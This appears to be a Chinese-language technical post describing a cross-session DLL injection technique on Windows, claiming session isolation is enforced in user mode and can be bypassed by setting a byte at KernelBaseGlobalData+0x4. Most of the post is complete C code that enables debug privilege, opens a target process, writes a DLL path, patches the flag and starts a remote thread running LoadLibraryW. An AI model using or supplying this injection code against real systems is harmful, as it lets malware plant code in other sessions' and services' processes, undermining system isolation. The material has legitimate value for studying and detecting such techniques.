有一件有意思的事 SESSION 隔離是在 RING 3 實作的,而非在 RING 0 裡實作,意思是使用者層可以修改session的标志位,CreateRemoteThreadEx中會判斷目前的會話級别,這裡隻需要在應用層修改自己的KernelBaseGlobalData+0x4的位置的資料為1就能完成跨session注入,但是有的程序你還是注入不了,這個也隻能解決在不同session下dll注入的問題,下圖是注入成功的圖
代碼如下所示
#include<windows.h>
#include<stdio.h>
typedef void* (__fastcall *LPFN_KernelBaseGetGlobalData)(void);
BOOL WINAPI InjectDllExW(DWORD dwPID, PCWSTR pwszProxyFile)
{
BOOL ret = FALSE;
HANDLE hToken = NULL;
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
FARPROC pfnThreadRtn = NULL;
PWSTR pwszPara = NULL;
PVOID pRemoteShellcode = NULL;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID);
if (!hProcess) {
//printf("Open Process failed\n");
return FALSE;
}
//得到函數位址,三環下對應的位置api位址都是相同的
pfnThreadRtn = GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryW");
//寫入字元串到被注入的程序
size_t iProxyFileLen = wcslen(pwszProxyFile) * sizeof(WCHAR);
pwszPara = (PWSTR)VirtualAllocEx(hProcess, NULL, iProxyFileLen, MEM_COMMIT,PAGE_READWRITE);
if (!pwszPara) {
//printf("VirtualAllocEx failed\n");
return FALSE;
}
WriteProcessMemory(hProcess, pwszPara, (PVOID)pwszProxyFile, iProxyFileLen, NULL);
//找修改的位置
LPFN_KernelBaseGetGlobalData pKernelBaseGetGlobalData = NULL;
UCHAR* pGlobalData = NULL;
UCHAR* pMisc = NULL;
ULONG PatchOffset = 0;
pKernelBaseGetGlobalData =(LPFN_KernelBaseGetGlobalData)GetProcAddress(LoadLibraryW(L"KernelBase.dll"), "KernelBaseGetGlobalData");
pGlobalData = (UCHAR*)pKernelBaseGetGlobalData();
PatchOffset = 0x4;
printf("PatchOffset: %x\n", pwszPara);
pMisc = pGlobalData + PatchOffset;
*pMisc = 1;
//建立遠端線程
hThread = CreateRemoteThread(hProcess, NULL, 0,(LPTHREAD_START_ROUTINE)pfnThreadRtn, pwszPara, 0, NULL);
//等待結束
WaitForSingleObject(hThread, INFINITE);
CloseHandle(hThread);
VirtualFreeEx(hProcess, pwszPara, 0, MEM_RELEASE);
CloseHandle(hProcess);
return TRUE;
}
BOOL EnableDebugPrivilege()
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return FALSE;
}
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) {
CloseHandle(hToken);
return FALSE;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
CloseHandle(hToken);
return FALSE;
}
return TRUE;
}
int main() {
EnableDebugPrivilege();
InjectDllExW(3288,L"C:\\Users\\Administrator\\Desktop\\InJecteDll.dll");
//LoadLibraryW(L"InJecteDll.dll");
system("pause");
return 0;
}